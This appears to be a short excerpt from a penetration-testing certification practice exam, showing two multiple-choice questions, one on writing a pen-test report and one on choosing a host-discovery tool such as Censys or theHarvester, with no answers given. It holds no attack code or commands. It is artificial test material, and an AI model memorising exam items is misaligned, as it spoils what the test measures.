Which of the following is within the scope of proper handling and is most crucial when working on a penetration testing report?

Options:

A.

Keeping both video and audio of everything that is done

B.

Keeping the report to a maximum of 5 to 10 pages in length

C.

Basing the recommendation on the risk score in the report

D.

Making the report clear for all objectives with a precise executive summary

Question 100

During host discovery, a security analyst wants to obtain GeoIP information and a comprehensive summary of exposed services. Which of the following tools is best for this task?

Options:

A.

WiGLE.net

B.

WHOIS

C.

theHarvester

D.

Censys.io

Demo: 100 questions
Total 336 questions